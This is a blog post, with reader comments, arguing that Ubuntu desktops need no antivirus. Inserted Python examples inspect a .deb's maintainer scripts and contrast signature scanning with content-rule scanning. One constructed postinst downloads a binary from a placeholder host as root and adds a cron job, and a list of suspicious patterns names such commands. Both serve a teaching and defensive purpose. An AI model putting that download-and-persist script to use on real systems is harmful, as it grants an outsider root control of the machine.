Does Ubuntu need antivirus?

This is a very common question that comes up on the Ubuntu Forums from new users migrating from Windows. The answer, of course, is “No, Ubuntu doesn’t need antivirus.” Linux (and sometimes Mac) users often get accused of being smug or complacent for saying they don’t need antivirus, so I think I have to clarify that answer for the skeptics.

What kind of virus are you looking for protection from?
I’m not an expert on all the terminology out there for malware, but for the purposes of this question there are basically two kinds: malware that self-replicates and spreads through security holes without any help from the user (worms), and malware that tricks the user into installing it (trojans, delivered through what’s called social engineering).

What makes the first kind such a problem in Windows (at least in XP—I’ve never tried Vista) is that the default account is an administrator account. That default is reinforced from several directions: some programs designed for Windows require the user to be an administrator; Windows documentation assumes you are one (very seldom have I seen instructions for installing a setup.exe tell you to right-click, select Run as… and authenticate with an administrator account, on the assumption that you normally use a limited user account); and not being an administrator all the time is inconvenient (Run as… is not perfect and is often difficult to use).

The administrator account in Windows has access to almost everything on the system, so if it gets compromised, the entire system is compromised. And if you’ve ever had to clean malware off a Windows computer, you know how difficult it is to get all the junk out of the registry and all the reappearing programs and .dll files out of system directories.

A limited user account, on the other hand, has write access only to its own profile and very few system directories. I don’t know of any Windows malware that targets limited user accounts, but if a limited user account got compromised, cleaning up the malware would be a lot easier: create a fresh account, copy the user files over from the compromised account one by one, quarantining and examining each as you go, and then delete the compromised account. (Malware confined to a user account can still read, send and destroy everything that account can reach, so the separation limits the damage and the cleanup, not the attack itself.)

In Ubuntu (and in most Linux distributions and Mac OS X), the default account operates mainly as a limited user account, with write access mainly to its own home directory, and a user in the admin group (in the case of Ubuntu and Mac OS X) is able to “sudo” and temporarily escalate privileges for a particular task after password authentication. On Linux distributions that don’t set up sudo by default, the equivalent is a temporary login to the root (total access) account with su for the duration of the task.

While a lot of people make the case that separating user privilege from system privilege alone guards against malware infestation (and they probably have a point), I’d at least argue that the separation makes cleanup after an infection a lot easier. The only trustworthy cleanup I know of for a compromised Windows computer is a complete reinstallation of the operating system, and the same goes for any system, Linux included, once root has been compromised; the separation only helps when the infection stayed inside the user account.

But then there is social engineering. This could be anything from a tainted email attachment a friend innocently sends you and you open, to a website asking you to download a “codec” (disguised malware) to play a video. The point is that the flaw isn’t the operating system itself but you, the user. If you’re tricked into installing a piece of malware, it won’t matter what kind of security you have set up. Don’t listen to Linux users who will tell you that you first have to make a file executable and then run it. With all the “user-friendly” graphical tools now available, all someone has to do is create a malicious “cool” .deb file for Ubuntu and trick Ubuntu users into downloading it, double-clicking it, and authenticating with their password. A .deb carries maintainer scripts (preinst, postinst and so on) that dpkg runs as root during installation, so that package can run any command with root privileges and compromise your entire system, no exploit required. It could install a keylogger or a rootkit. Packages from the Ubuntu repositories are signed and reviewed; a .deb downloaded from a random website is neither, and the password prompt you get when you double-click it looks exactly like the one you get for a legitimate package.
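Since a .deb is just an archive, you can look inside it before you hand it your password. The following is an added example, not code from the original post: it builds a small constructed package in memory (the package name cool-codec, its postinst and the list of suspicious patterns are assumptions made for the example) and then does what a cautious user would do with an untrusted download, namely lists the maintainer scripts that would run as root, shows their contents and the files that would be unpacked, and flags a few patterns worth a second look. With dpkg installed, `dpkg-deb --info pkg.deb postinst` gives the same view of a real package.

```python
"""Inspect a .deb before installing it (added example, not from the post).

A .deb is an `ar` archive holding `debian-binary`, `control.tar.*`
(package metadata plus the maintainer scripts preinst/postinst/prerm/postrm,
which dpkg runs as root) and `data.tar.*` (the files to unpack).
"""
import io
import tarfile

AR_MAGIC = b"!<arch>\n"
MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")
# Heuristic patterns only; an assumption for this example, not an
# authoritative list of what a malicious maintainer script contains.
SUSPICIOUS = ("curl ", "wget ", "/etc/cron", "/root/.ssh", "authorized_keys",
              "chmod u+s", "chmod 4", "LD_PRELOAD", "/etc/ld.so.preload")


def _ar_entry(name: str, data: bytes) -> bytes:
    """Encode one ar member: 60-byte header, data, pad byte if size is odd."""
    header = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode("ascii")
    assert len(header) == 60
    return header + data + (b"\n" if len(data) % 2 else b"")


def _tar_gz(entries: dict) -> bytes:
    """Build a gzip-compressed tar from {path: bytes}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, content in entries.items():
            info = tarfile.TarInfo(path)
            info.size = len(content)
            info.mode = 0o755 if path.lstrip("./") in MAINTAINER_SCRIPTS else 0o644
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def build_deb(control_fields: str, scripts: dict, payload: dict) -> bytes:
    """Assemble a .deb in memory (used here only to construct the sample)."""
    control = {"./control": control_fields.encode()}
    control.update({f"./{n}": s.encode() for n, s in scripts.items()})
    data = {f"./{p}": b for p, b in payload.items()}
    return (AR_MAGIC
            + _ar_entry("debian-binary", b"2.0\n")
            + _ar_entry("control.tar.gz", _tar_gz(control))
            + _ar_entry("data.tar.gz", _tar_gz(data)))


def parse_ar(blob: bytes) -> dict:
    """Split an ar archive into {member name: bytes}."""
    if not blob.startswith(AR_MAGIC):
        raise ValueError("not an ar archive (bad magic)")
    members, pos = {}, len(AR_MAGIC)
    while pos + 60 <= len(blob):
        header = blob[pos:pos + 60]
        if header[58:60] != b"`\n":
            raise ValueError("corrupt ar header")
        name = header[0:16].decode("ascii").strip().rstrip("/")
        size = int(header[48:58])
        start = pos + 60
        members[name] = blob[start:start + size]
        pos = start + size + (size % 2)  # members are 2-byte aligned
    return members


def _tar_entries(data: bytes) -> dict:
    """Read a (possibly compressed) tar into {path without './': bytes}."""
    out = {}
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for m in tar.getmembers():
            name = m.name[2:] if m.name.startswith("./") else m.name
            if m.isfile():
                out[name] = tar.extractfile(m).read()
    return out


def inspect_deb(blob: bytes) -> dict:
    """Return control fields, maintainer scripts, payload paths and flags."""
    members = parse_ar(blob)
    ctl_name = next(n for n in members if n.startswith("control.tar"))
    data_name = next(n for n in members if n.startswith("data.tar"))
    control = _tar_entries(members[ctl_name])
    scripts = {n: control[n].decode() for n in MAINTAINER_SCRIPTS if n in control}
    flags = [f"{n}: {pat!r}" for n, text in scripts.items()
             for pat in SUSPICIOUS if pat in text]
    return {"control": control.get("control", b"").decode(),
            "scripts": scripts,
            "files": sorted(_tar_entries(members[data_name])),
            "flags": flags}


# Constructed sample: a "codec" package whose postinst does far more than
# install a codec. The URL and paths are made up for the example.
SAMPLE_POSTINST = """#!/bin/sh
set -e
wget -q -O /usr/local/bin/helper http://example.invalid/helper
echo '* * * * * root /usr/local/bin/helper' > /etc/cron.d/helper
"""
SAMPLE_DEB = build_deb(
    "Package: cool-codec\nVersion: 1.0\nArchitecture: all\n"
    "Maintainer: nobody <nobody@example.invalid>\nDescription: constructed sample\n",
    {"postinst": SAMPLE_POSTINST},
    {"usr/share/doc/cool-codec/README": b"constructed sample\n"},
)

if __name__ == "__main__":
    report = inspect_deb(SAMPLE_DEB)
    print(report["control"])
    for name, text in report["scripts"].items():
        print(f"--- {name} (runs as root during installation) ---\n{text}")
    print("files:", *report["files"], sep="\n  ")
    print("flags:", *report["flags"], sep="\n  ")
```

The pattern list is deliberately crude; the point of the check is to read the maintainer scripts yourself before authenticating, because whatever they contain runs as root regardless of how harmless the package looks in the software center.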

Another time you shouldn’t listen to Linux users is when they try to say a lack of malware on Linux has nothing to do with marketshare, since Linux dominates the server scene, and Linux servers are not more compromised by malware than Windows servers. While what they’re saying is true, it’s also misleading. Most corporate servers are run by trained professionals or at least knowledgeable amateurs, and they’re less likely than the general populace to fall for a phishing scam or other kind of social engineering attack. This is not true, however, for home users. Nevertheless, the point is moot. If security by minority has any validity, I think you can rest pretty easy that within the next three years, Ubuntu won’t reach over 50% of home user marketshare, no matter how successful it is or how many “years of the Linux desktop” pass by.

But don’t Linux viruses exist?
Yes, but they are either proof-of-concept ones created for research purposes or ones that took advantage of flaws that have since been patched. There aren’t any Linux viruses that are actual threats to Linux desktops; the Linux malware that does exist mostly goes after unpatched or badly configured network services on servers (weak SSH passwords, old web applications), which is an argument for applying security updates promptly, not for running antivirus. If malware relies on social engineering, though, and you’re tricked into installing it, then your system is screwed either way—running an antivirus program won’t help you.

Should you run antivirus just in case?
Well, obviously I can’t stop you. You can also wear a gas mask around all the time when walking through perfectly healthy air. I won’t stop you from doing that either. But in either case, I’m not going to pretend what you’re doing makes sense.

Most antivirus applications in Linux scan mainly for Windows viruses, and if a Linux virus came into existence and actually was a threat, it wouldn’t be in your antivirus application’s definitions anyway, since the virus is new: a definition gets written after a sample has been found and analyzed, which is after the first victims have already been infected. So you wouldn’t be protected. A vaccine against polio isn’t going to protect you from getting AIDS. Neither is an outdated set of virus definitions going to protect you against a new threat.

Shouldn’t we protect Windows users?
Some have made the case that it is our responsibility to protect our Windows-using friends and relatives by scanning files before they’re sent to Windows users. While that case could be made, I don’t think Linux home users make up a large enough demographic to protect Windows users in such a way. It’s about as effective as building a wall around a city for protection but having the wall go less than a tenth of the way around the city. Great. The attackers will just go to a different entrance to attack the city. (See the first link in the Further Reading section for more details.)

This brings up a good point, though. If you’re using Ubuntu as a regular desktop or laptop computer, you don’t need to run antivirus, but if you’re using Ubuntu as a mail server (or as a file server for Windows clients), you probably should install and use antivirus, since you would be scanning files on behalf of the Windows machines that actually run them. In fact, many mail servers are Linux-based, so you would be part of a very large wall—an actual first line of defense.

What good is antivirus?
I do have to say, though, I think antivirus is mainly a resource hog and almost a placebo. It’s something that makes people think they’re secure without actually making them secure. In fact, every time I’ve seen a Windows-using family member or friend get infected with malware, that person has always been running antivirus, antispyware, etc. You can’t rely on a program to protect you. You have to learn good security practices yourself—don’t run as administrator regularly, use strong passwords, learn to recognize social engineering and phishing scams, do not visit sketchy websites, etc. Relying on anti* programs for protection is like thinking the vaccinations you get from the doctor protect you against all disease in life. You can’t then just have unprotected promiscuous sex, never wash your hands, eat anything you find in the forest, and have extensive physical contact with sick people, and then expect to stay healthy.

Antiviruses operate in two ways, and ultimately neither way ends up being effective for home use. One way is maintaining a list of known viruses (the definitions, or signatures). Well, when a new virus shows up, it won’t be in that list until after it has been found and analyzed, which is after it’s done some serious damage. The other way (heuristics) is trying to identify malware from the content or behaviour of a file. This leads to a lot of false positives and essentially defeats the point of antivirus, since it ends up being the user who decides which files are trustworthy… or the user gets used to overriding the antivirus application’s false positives to the point that it’s like whitelisting everything. I would actually argue that you don’t need antivirus in Windows either. I know that sounds brash, but I believe it’s true. If you want Windows to be secure, use a limited user account, show file extensions for all files, use Thunderbird instead of Outlook, learn how to identify and avoid social engineering, and use strong passwords.
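The two failure modes described above can be shown in a few lines. This is an added example, not code from the original post: two miniature detectors, a definitions list (SHA-256 hashes of known-bad files, which is what a signature database boils down to) and a content rule (a byte pattern a made-up “family” contains), run over constructed samples that are not real malware. The “known” sample, the one-byte variant, the obfuscated variant, the marker string and the rule names are all assumptions made for the example.

```python
"""Definitions versus content rules (added example, not from the post)."""
import hashlib

MZ = b"MZ\x90\x00"                          # start of a DOS/PE executable header
MARKER = b"upload-stolen-credentials-v1"   # constructed "family" string

# Constructed samples (not real malware):
KNOWN_BAD = MZ + b"\x00" * 8 + MARKER + b"\x00" * 8
VARIANT = KNOWN_BAD[:-1] + b"\x01"         # one byte differs from the known sample
OBFUSCATED = MZ + b"\x00" * 8 + bytes(b ^ 0x5A for b in MARKER) + b"\x00" * 8
BENIGN_NOTE = b"incident notes: the sample contained the string " + MARKER + b"\n"
CLEAN = b"#!/bin/sh\necho hello\n"

SAMPLES = {"known": KNOWN_BAD, "variant": VARIANT, "obfuscated": OBFUSCATED,
           "benign_note": BENIGN_NOTE, "clean": CLEAN}

# The "definitions": exact hashes of samples already seen and analyzed.
DEFINITIONS = {hashlib.sha256(KNOWN_BAD).hexdigest(): "Trojan.Constructed.A"}
# The content rule: a pattern that the family is known to carry.
CONTENT_RULES = {MARKER: "Heur.Constructed.Upload"}


def scan_by_definition(data: bytes):
    """Exact match against the definitions list; misses anything new."""
    return DEFINITIONS.get(hashlib.sha256(data).hexdigest())


def scan_by_content(data: bytes, executables_only: bool = False):
    """Pattern match; optionally only inside files that look executable."""
    if executables_only and not (data.startswith(MZ) or data.startswith(b"\x7fELF")):
        return None
    for pattern, name in CONTENT_RULES.items():
        if pattern in data:
            return name
    return None


def scan_all(samples: dict) -> dict:
    """Run every detector over every sample.

    Returns {label: (definition hit, loose content hit, executables-only hit)}.
    """
    return {label: (scan_by_definition(d), scan_by_content(d), scan_by_content(d, True))
            for label, d in samples.items()}


if __name__ == "__main__":
    for label, (by_def, loose, strict) in scan_all(SAMPLES).items():
        print(f"{label:<12} definitions={by_def!s:<22} "
              f"content={loose!s:<24} content(exe only)={strict}")
```

The run shows each mode failing in its own way: the definitions catch only the exact sample they were written for and miss the one-byte variant; the loose content rule catches the variant but also flags the benign text file that merely mentions the string; restricting the rule to executable-looking files removes that false positive, and a trivially obfuscated variant still walks past all three. None of this changes when the sample is a social-engineering download the user has already chosen to run.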

Conclusion
Frankly, I’ve never seen a real epidemic threat to Ubuntu users, but if one appeared, I promise you that having antivirus installed would not protect you from it. Saying you don’t need antivirus in Ubuntu is not complacency—it’s common sense. Learn about real security good practices and stop clinging to the antivirus placebo.

Further Reading
A succinct sum-up of this rather long-winded blog post you’re reading
A short write-up on Ubuntu security
A more in-depth write-up on Ubuntu security

18 comments

  1. I think there is one type of antivirus effective for Windows: the “scan this file and that’s it” kind. I use AVG, and dual boot Vista/Ubuntu, and I’ve gotta say, I never run full-system scans. By the time one of those picks up something, it’s probably too late. I do, however, run an individual file scan on anything I download (other than like a .txt to-do list or something) just in case. That, I think, is good as an extra line of protection, and a first line of defense against even social engineering attacks. It won’t stop everything, but for the ones that would have gotten through on my stupidity, it at least provides some cover.

  2. We are running Ubuntu 8.04 and have ClamAV installed. It is easy to install, as it is in the “Add/Remove” repositories as “Virus Scanner”.

    The designer of the Linux GUI for ClamAV, known as ClamTk, says this in his FAQ about whether you need it or not http://clamtk.sourceforge.net/faq.html :

    Q: “I thought Linux doesn’t NEED antivirus protection!”

    A: “You probably do not need it. But if you feel more comfortable using it, great.”

    We avoid all the viruses distributed out there on the net by doing just as you have described here in your article. Actually we use webmail instead of Thunderbird, which gives even more security as everything gets scanned before we even read it plus all downloads are scanned too.

    However we also update ClamAV regularly and run it from the command line to do a whole system scan now and then. It doesn’t hurt to do this and it certainly doesn’t lull us into a false sense of security. Sometimes we use ClamTk to scan a suspicious single file, just to see if it is something we don’t want to forward on to a Windows user. Anything that might come up positive we would upload to Jotti’s malware scanner at http://virusscan.jotti.org/ for 20 extra “second opinions”.

    In running ClamAV on our Ubuntu systems we have never found any viruses, but have had several “false alarm files”. These are benign, often system files, that ClamAV has mistaken for viruses. We always submit these to the Clam open source dev team through http://cgi.clamav.net/sendvirus.cgi and thus can feel that we are contributing in a small way to helping make the only open source free software anti-virus project better and more competitive with its commercial competitors. It takes little time and costs us nothing to do the scans and submit the odd false alarm report.

  3. I agree 99.99% with the writer of this article. Although he states that you shouldn’t run from the admin account all of the time, I do anyway because I like having access to Windows files. But social engineering is the only reason un-computer-savvy people get viruses, because they do not know what they are doing. But I have seen people get viruses that have infected their PC, and they did have full running VP. And the only way, like the writer stated, to safely get it off was to reload the OS. Oh yeah, Ubuntu rocks.

  4. I don’t believe that the author of the article is smug – just a little naive.
    He states that installing malware would be difficult because of the way Linux is set up into two different types of accounts. The administrator has the right to install programs and modify settings; the user just uses the system and the software. What makes this statement naïve is the idea that this “wall” will not be surmounted. At this time, Linux has, according to Wikipedia, a market share of just 2% in the overall desktop OS segment. These numbers alone make Linux uninteresting to the criminal hacker, who has a bigger target in Windows’ 90%. But what if the goal of the Linux community to surpass Windows is reached? Then the interest would be piqued, because now hackers have a bigger target. Having access to the entire source code of Linux – kernel and applications – makes it even easier to infiltrate a system considered safe.

  5. Well,
    I think the writer of the article has busted all doubts regarding the very famous topic “Virus Protection for Linux”.
    As I often come across people arguing with me on the topic, I can simply redirect them on this article.
    I am absolutely with the writer and believe that nothing can actually stop viruses entering Windows Systems. Whereas Linux, because of its internal architecture is much much more secure than Windows.
    Also, there is no cure of “Social Engineering”.
    Being secure is an art, not science.

  6. Everything is right for everyone; everyone can express their opinion because it is free, but meikel14 is right. Because, just as nobody’s perfect, nothing’s perfect.

  7. Just don’t use a proprietary bundle of software called Windows. Use something based off Unix, or Unix-like. The security models are superior to Windows’ design of an open system that just got crappy locks. The user is always at fault – the number one cause of computer issues.

  8. I would agree with what the writer documented in this article. Yeah. The only way to secure a Windows system is to use a firewall and use non-Microsoft products, like Firefox and Thunderbird. Still, I love saying this: “UBUNTU ROCKS”

  9. Linux in general rocks. I remember when I first installed Ubuntu I went to http://www.grc.com/x/ne.dll?rh1dkyd2 to test how secure the distro was, and was amazed to see every port was registered as “stealth”. In comparison, with Vista half the ports were either “open” or “closed”. But I agree with what the author mentioned: it is basically up to the user to determine the security of his OS.

  10. meikel14 is absolutely right. It is foolish to think that Linux would always be the safest route. While I agree that it is now, and am very impressed by its open-source philosophy, it is true that the free source code would prove to be a spectacular tool for the malicious user. However, I still find it unlikely that Linux will ever get quite that popular, so for now I’m comfortable sitting here with my safe OS.

  11. It is foolish to think Linux will always be the safest route. Good thing I never said that.

    The post, if you read it, is about whether you should run antivirus or not.

    And the bottom line is that whether there are real security threats or not, running antivirus does not protect you. Antivirus is useless.

    As for source code availability making it easier for malicious folks to compromise a system, that sounds right in theory, but in practice, we know this not to be true. If it were true, closed source operating systems and applications would almost never be compromised… and they almost always are.

  12. Antivirus is not the “locks on the doors”; it’s the alarm system that *might* go off after you’ve already been compromised…

    A malicious user may have access to Linux source code, but he will NOT have the ability to inject malware into future Linux releases to be exploited.

    And should anyone be worried that a malicious user has the ability to scan the source code looking for vulnerabilities? No… Millions of other eyeballs have preceded him doing the very same thing — and removing the vulnerabilities as they find them.

    This sort of scrutiny & vetting does NOT happen with closed-source operating systems. (When’s the last time you successfully submitted a bug report to Microsoft for “leaving the doors open” in Windows?)

  13. Those advocating the theory that Linux is only more secure because of its low market share (Peter, meikel14) should do some more research. Simply not true.
    The Unix security model *does* make a huge difference as compared to Windows. As the author says, nothing will make people safe if they behave stupidly and install recklessly, but at least Linux *allows* a user to behave safely.
    Security by obscurity does not work! Source code makes a system much more secure. The black box DLL model that Windows runs under for profiteering reasons is also bad engineering for security and performance. Local compiles are a better way.(But then source code gets distributed…not good for profits!)

  14. Yeah!
    Anti-virus software is just defense display software to delete virus programs. Whether OS or Linux should use it or not!
    According to Meikel14, yeah, maybe he’s right. ’Cause hackers break only the OS which most users access. They produce hacking code for the most popular operating system. That’s why people say Windows is not as secure as Linux; the answer is Windows has more users’ beliefs than Linux’ OS. So, as for the current condition, Linux doesn’t need anti-virus software immediately. Meaning not needed for now.
    Maybe in the next several years, when users think Linux is more secure than Windows, and hackers think most people they try to hack are using Linux rather than Windows, they will also produce new virus programs to attack, and then Linux will also need more useful anti-virus programs, just like Windows needs now.
    A good OS will always be followed by hackers…

  15. Hullo there, was perusing your tutorial a few moments ago–particularly the portion on security. I’m relatively new to Linux systems all in all, but I’ve been working with Windows since all I had was a Tandy 1000 that ran on DOS (thinking back, my floppy drive and copies of Hangman on them seemed pretty spiffy back then). Not necessarily relevant to the following, just a bit of an introduction.

    What I actually wanted to comment on was a few simple steps that anyone can use to beef up security on their computer (running any OS). I’ll outline them in a few points.

    User accounts. As much as you can do your work from an account without administrative privileges. This can help you save yourself from accidentally downloading a file which may contain software that self-loads/installs. It may also allow you to remove anything remotely from the infected account without causing harm to critical software segments.

    Downloads. You went into this a bit. I concur, you should never click links inside emails. One can take this a bit further. Regardless of your OS, know which file extensions indicate programs or script files. If you have any doubts about a file extension, Google doesn’t.

    Internet and routers. It is amazing how many layers of security you can add to your network, especially if you use a wireless connection. It is no secret that wireless signals can be found easily, but they have encryption protocols for a reason. Use them. For instance, if you use LinkSys, your router’s domain is http://192.168.1.1 go there if you never have. If you’ve never been there your account/password will be admin/admin or just the password admin with no account name. Regardless of your router’s make, it will be some combination of this by default. If you can’t figure out how to access it, Google can. Once you get there change your router to use a secure network (which means it requires a password to log on to it). Avoid WEP if at all possible, it is antiquated and YouTube can show you how to hack it in all of 5 minutes. Your best option is WPA or WPA2. Another layer of security you can add is pretty simple. Determine the MAC address (sometimes called the “physical address”) of every computer you want to use your internet. It will be a 12 digit number in hexadecimal format (should look something like this–00:2B:89:94:EC:43–not mine by the way, just a number I made up). After you know what this is for each computer on your network, return to your router’s domain and modify the settings so that your router only authenticates access attempts from devices with those addresses (this helps because each MAC address is unique to each networking device/card and is assigned at the factory at which it is made). Lastly, change your router’s access password (the one for the router’s domain, not your internet) from the default setting. If you don’t, any jerk with a laptop (within range of the device) can access the website and modify your settings to his liking or worse lock you out of your own network. Just by doing these simple tasks you will have added 3 layers of extra protection.

    The best thing to keep in mind is that nothing can make you 100% squeaky-clean and safe. There will always be people out there trying to do things to screw other people over. Just use common sense. I spared quite a bit of detail, but with a little know-how and a devil-may-care attitude you can do all these things. Plus, always always remember Google can teach you how to do anything. Except build a quantum particle accelerator and travel through time. Or can it?

  16. >>”Well, obviously I can’t stop you. You can also wear a gas mask around all the time when walking through perfectly healthy air. I won’t stop you from doing that either. But in either case, I’m not going to pretend what you’re doing makes sense.”<<

    That is probably the best analogy I have ever read describing that issue!

    I have only recently begun running Ubuntu 11.04 and I honestly feel like jumping in a pool of disinfectant every time I have to use Windows on public PCs.

    How did such piss-poor, filthy, slow and futile software become so widespread?

    People just need to know that there is a better alternative to Windows I guess…
